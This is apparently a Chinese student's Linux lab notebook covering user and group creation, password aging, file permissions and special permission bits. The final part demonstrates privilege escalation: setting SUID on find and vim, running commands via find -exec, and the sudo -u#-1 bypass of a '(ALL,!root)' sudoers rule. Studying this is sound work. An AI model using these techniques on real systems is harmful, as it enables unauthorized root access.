题目1
Linux 用户与组管理
-
创建一个名为bk2304 的组,组id 为2000
-
创建一个名为bk2305 的组,组id 为2001
-
创建tom 用户,指定uid 为1500,基本组为bk2304,附加组为bk2305
-
创建jerry 用户,指定uid 为1501,基本组为bk2304,附加组为bk2305
-
为tom 用户和jerry 设定密码
-
修改tom 用户的密码最长有效期为90
-
锁定jerry 用户的密码
过程
[root@gp gp]# groupadd bk2304 -g 2000
[root@gp gp]# groupadd bk2305 -g 2001
[root@gp gp]# tail -3 /etc/group
gp:x:1000:gp
bk2304:x:2000:
bk2305:x:2001:
[root@gp gp]# useradd tom -u 1500 -g bk2304 -G bk2305
[root@gp gp]# useradd jerry -u 1501 -g bk2304 -G bk2305
[root@gp gp]# passwd jerry
Changing password for user jerry.
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
[root@gp gp]# passwd tom
Changing password for user tom.
New password:
BAD PASSWORD: The password fails the dictionary check - it is too simplistic/systematic
Retype new password:
passwd: all authentication tokens updated successfully.
[root@gp gp]# passwd tom -x 90
Adjusting aging data for user tom.
passwd: Success
[root@gp gp]# passwd -S tom
tom PS 2023-10-07 0 90 7 -1 (Password set, SHA512 crypt.)
[root@gp gp]# passwd jerry -x 90
Adjusting aging data for user jerry.
passwd: Success
[root@gp gp]# passwd -S jerry
jerry PS 2023-10-07 0 90 7 -1 (Password set, SHA512 crypt.)
[root@gp gp]# passwd -l tom
Locking password for user tom.
passwd: Success
[root@gp gp]# passwd -l jerry
Locking password for user jerry.
passwd: Success
题目2
权限演变
-
笔记中权限演变过程,操作一遍
-
把ajest 换成自己的名字
过程
[root@gp gp]# touch /tmp/gp.txt
[root@gp gp]# ls -l /tmp/gp.txt
-rw-r--r-- 1 root root 0 Oct 7 20:57 /tmp/gp.txt
[root@gp gp]# chmod u-r /tmp/gp.txt
[root@gp gp]# ls -l /tmp/gp.txt
--w-r--r-- 1 root root 0 Oct 7 20:57 /tmp/gp.txt
[root@gp gp]# chmod u-w /tmp/gp.txt
[gp@gp ~]$ echo "666" >> /tmp/gp.txt
bash: /tmp/gp.txt: Permission denied
[root@gp gp]# mkdir /tmp/rootdir
[root@gp gp]# ls -ld /tmp/root
[gp@gp ~]$ cd /tmp/rootdir/
[gp@gp rootdir]$ echo "this is from ajest" >> gp.txt
bash: gp.txt: Permission denied
[gp@gp rootdir]$ ls -ld /tmp/rootdir/
drwxr-xr-x 2 root root 22 Oct 7 21:20 /tmp/rootdir/
[root@gp gp]# chmod o=--- /tmp/rootdir/
[gp@gp rootdir]$ ls -ld /tmp/rootdir/
drwxr-x--- 2 root root 22 Oct 7 21:20 /tmp/rootdir/
[root@gp gp]# chmod o=rwx /tmp/rootdir/
[gp@gp rootdir]$ echo "this is from gp" >> /tmp/rootdir/gp.txt
[gp@gp rootdir]$ ls /tmp/rootdir/
gp.txt root.txt
[gp@gp rootdir]$ echo "this is from gp" >> /tmp/rootdir/root.txt
bash: /tmp/rootdir/root.txt: Permission denied
[gp@gp rootdir]$ rm -rf /tmp/rootdir/root.txt
[gp@gp rootdir]$ ls /tmp/rootdir/
[gp@gp rootdir]$
题目3
特殊权限位验证
-
粘滞位
-
SGID
-
SUID
过程
[tom@gp rootdir]$ mkdir /tmp/tom
[tom@gp rootdir]$ ls -ld tom
ls: cannot access tom: No such file or directory
[tom@gp rootdir]$ ls -ld /tmp/tom
drwxr-xr-x 2 tom bk2304 6 Oct 7 21:44 /tmp/tom
[tom@gp rootdir]$ chmod 777 /tmp/tom
[tom@gp rootdir]$ cd /tmp
[tom@gp tmp]$ ls -ld tom
drwxrwxrwx 2 tom bk2304 6 Oct 7 21:44 tom
[tom@gp tmp]$ cd tom
[tom@gp tom]$ echo "i am tom" > tom.txt
[tom@gp tom]$ chmod 777 tom.txt
[tom@gp tom]$ su jerry
Password:
[jerry@gp tom]$ cd /tmp/tom
[jerry@gp tom]$ echo "test" >> tom.txt
[jerry@gp tom]$ cat tom.txt
i am tom
test
[jerry@gp tom]$ rm tom.txt
重复上面步骤,切换到 tom 用户,在 tom 目录下新建 tom.txt,并写入 “i am tom”,赋予 tom.txt 最高权限,为 tom.txt 文件的父目录 tom 添加粘滞位
echo "i am tom" > tom.txt
chmod 777 tom.txt
cd ..
chmod o+t tom
随后jerry无法删除
cd /tmp
mkdir gp
ls -lhd gp
su root
touch gp/test1.txt
ls -l gp
su gp
chmod g+s gp
su root
touch gp/test2.txt
ls -l gp
ls -lhd gp
find / -perm -4000 2>/dev/null
# 或
find / -perm -u=s -type f 2>dev/null
chmod u+s /usr/bin/find
# 赋予 find 特殊权限位
find /tmp -exec "whoami" \;
which vim
# 查找 vim 位置
chmod u+s /usr/bin/vim
ls -l /usr/bin/vim
# 赋予 find 特殊权限位
sudo -u#uid whoami
sudo -u#uid whoami
gp ALL=(ALL,!root) /usr/bin/whoami
sudo -u#-1 /usr/bin/whoami
su root
visudo
gp ALL=(ALL,!root) /usr/bin/whoami,/usr/bin/id
su ggg
sudo -u root whoami
sudo -u root id
sudo -u#0 whoami
sudo -u#0 id
sudo -u#-1 id
sudo -u#-1 whoami